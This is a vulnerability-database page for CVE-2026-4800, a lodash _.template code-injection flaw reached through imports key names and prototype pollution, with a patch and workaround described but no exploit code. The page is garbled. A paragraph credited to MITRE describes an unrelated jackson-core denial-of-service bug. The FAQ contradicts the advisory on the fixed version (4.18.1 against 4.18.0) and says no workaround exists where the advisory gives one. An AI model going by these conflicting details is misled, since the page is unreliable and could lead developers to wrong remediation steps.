CVE-2026-4800: lodash vulnerable to Code Injection via `_.template` imports key names
Impact
The fix for CVE-2021-23337 added validation for the variable option in .template but did not apply the same validation to options.imports key names. Both paths flow into the same Function() constructor sink.
When an application passes untrusted input as options.imports key names, an attacker can inject default-parameter expressions that execute arbitrary code at template compilation time.
Additionally, .template uses assignInWith to merge imports, which enumerates inherited properties via for..in. If Object.prototype has been polluted by any other vector, the polluted keys are copied into the imports object and passed to Function().
Patches
Users should upgrade to version 4.18.0.
The fix applies two changes: 1. Validate importsKeys against the existing reForbiddenIdentifierChars regex (same check already used for the variable option) 2. Replace assignInWith with assignWith when merging imports, so only own properties are enumerated
Workarounds
Do not pass untrusted input as key names in options.imports. Only use developer-controlled, static key names.
Other sources
Impact:
The fix for CVE-2021-23337 (https://github.com/advisories/GHSA-35jh-r3h4-6jhm) added validation for the variable option in .template but did not apply the same validation to options.imports key names. Both paths flow into the same Function() constructor sink.
When an application passes untrusted input as options.imports key names, an attacker can inject default-parameter expressions that execute arbitrary code at template compilation time.
Additionally, .template uses assignInWith to merge imports, which enumerates inherited properties via for..in. If Object.prototype has been polluted by any other vector, the polluted keys are copied into the imports object and passed to Function().
Patches:
Users should upgrade to version 4.18.0.
Workarounds:
Do not pass untrusted input as key names in options.imports. Only use developer-controlled, static key names.
— MITRE
The non-blocking (async) JSON parser in jackson-core bypasses the maxNumberLength constraint (default: 1000 characters) defined in StreamReadConstraints. This allows an attacker to send JSON with arbitrarily long numbers through the async parser API, leading to excessive memory allocation and potential CPU exhaustion, resulting in a Denial of Service (DoS). The standard synchronous parser correctly enforces this limit, but the async parser fails to do so, creating an inconsistent enforcement policy.
— IBM
Affected Software
Remediation
Event History
Frequently Asked Questions
What is the severity of CVE-2026-4800?
CVE-2026-4800 is rated as a high severity vulnerability due to its potential for code injection.
How can I fix CVE-2026-4800?
To fix CVE-2026-4800, update lodash to version 4.18.1 or later, where the issue has been addressed.
What impact does CVE-2026-4800 have on my application?
CVE-2026-4800 allows attackers to execute arbitrary code within the context of the application that uses lodash's template function.
Which versions of lodash are affected by CVE-2026-4800?
Lodash versions before 4.18.1 are affected by CVE-2026-4800.
Is there a workaround for CVE-2026-4800?
There is no effective workaround for CVE-2026-4800 other than upgrading to a patched version of lodash.